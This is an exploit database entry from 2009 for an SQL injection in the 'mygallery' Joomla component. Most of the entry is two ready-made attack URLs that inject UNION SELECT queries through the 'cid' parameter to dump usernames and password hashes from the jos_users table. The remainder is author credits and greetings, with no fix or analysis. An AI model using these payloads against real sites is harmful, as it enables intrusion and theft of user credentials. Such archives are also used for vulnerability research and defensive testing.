Joomla! Component mygallery - 'farbinform_krell' SQL Injection

EDB-ID:

10214

CVE:

N/A


Platform:

PHP

Published:

2009-11-23

## AUTHOR :  MANAS58  BAYBORA
## Script :  mygallery Joomla Component ( farbinform_krell)
## DorKs :  :(((
## EXPLOIT :

http://server/index.php?option=com_mygallery&func=viewcategory&cid=-1+union+all+select+1,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11,12,13,14,15+from+jos_users
  
OR:

http:///server/index.php?option=com_mygallery&func=viewcategory&cid=-1+union+all+select+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+jos_users


## WWW.1923TURK.BÝZ
## GREETZ  :  DELÝBEY TÝAMO